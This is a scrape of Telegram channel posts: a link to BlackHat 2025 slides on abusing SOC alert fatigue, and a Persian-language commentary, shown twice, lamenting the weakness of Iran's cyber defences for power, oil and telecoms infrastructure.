Conferences/BlackHat_USA_2025_Slides/Rex Guo&Khang Nguyen_Death by Noise Abusing Alert Fatigue to Bypass the SOC (EDR Edition).pdf…
Conference presentation slides. Contribute to onhexgroup/Conferences development by creating an account on GitHub.
❤5🔥5👍4😁1
⭕️نفوذ سایبری آمریکا به شبکه برق ونزوئلا یک هشدار مستقیم به ایران خواهد بود ،
آیا سیستم های 25 سال پیش آپدیت گشته ی زیرساختهای برق و و نفت و پتروشیمی و مخابرات کشور روز دوم جنگ هک خواهد شد یا با ساعت اول جنگ همگی فلج خواهند شد؟
حدود 20 سازمان بودجه بگیر مختلف در کشور وجود دارد که متولی امنیت هستند ، اما کدام تاحالا توانسته به امنیت سایبری ایران کمکی کرده باشد؟
ما در کشور ایران آزمایشگاه امنیت نرم افزار و سخت افزار نداریم و بودجه های دولتی در شرکت های امنیت سایبری وابسته ی بدردرنخور خرج میشوند ، سرورها همگی دسته دوم از کشورهای همسایه تهیه میشن و بدون هیچ گونه تحلیل امنیتی بعد از وایپ کردن مستقیم میفرستن مورد استفاده قرار بگیرند ، در جنگ 12 روزه شاهد بودید با هر حرکتی از یک تیم وابسته به رژیم اسراییل چه بانک ها و جاهای بزرگی هک شد و چه زیرساخت هایی سالها توسط رژیم مورد نفوذ قرار گرفته شده و اطلاع نداشتن !
آیا جنگ بعدی رخ بدهد یک نفر راه ارتباطی ای خواهد داشت از کسی انلاین خبری بگیرد؟
یا تمامی شبکه های مخابراتی فرسوده ی کشور همگی در دستان آمریکا و اسراییل خواهد بود؟
کی بیدار میشید دقیقا؟
@securation
آیا سیستم های 25 سال پیش آپدیت گشته ی زیرساختهای برق و و نفت و پتروشیمی و مخابرات کشور روز دوم جنگ هک خواهد شد یا با ساعت اول جنگ همگی فلج خواهند شد؟
حدود 20 سازمان بودجه بگیر مختلف در کشور وجود دارد که متولی امنیت هستند ، اما کدام تاحالا توانسته به امنیت سایبری ایران کمکی کرده باشد؟
ما در کشور ایران آزمایشگاه امنیت نرم افزار و سخت افزار نداریم و بودجه های دولتی در شرکت های امنیت سایبری وابسته ی بدردرنخور خرج میشوند ، سرورها همگی دسته دوم از کشورهای همسایه تهیه میشن و بدون هیچ گونه تحلیل امنیتی بعد از وایپ کردن مستقیم میفرستن مورد استفاده قرار بگیرند ، در جنگ 12 روزه شاهد بودید با هر حرکتی از یک تیم وابسته به رژیم اسراییل چه بانک ها و جاهای بزرگی هک شد و چه زیرساخت هایی سالها توسط رژیم مورد نفوذ قرار گرفته شده و اطلاع نداشتن !
آیا جنگ بعدی رخ بدهد یک نفر راه ارتباطی ای خواهد داشت از کسی انلاین خبری بگیرد؟
یا تمامی شبکه های مخابراتی فرسوده ی کشور همگی در دستان آمریکا و اسراییل خواهد بود؟
کی بیدار میشید دقیقا؟
@securation
👍48😁10👎7❤4👏3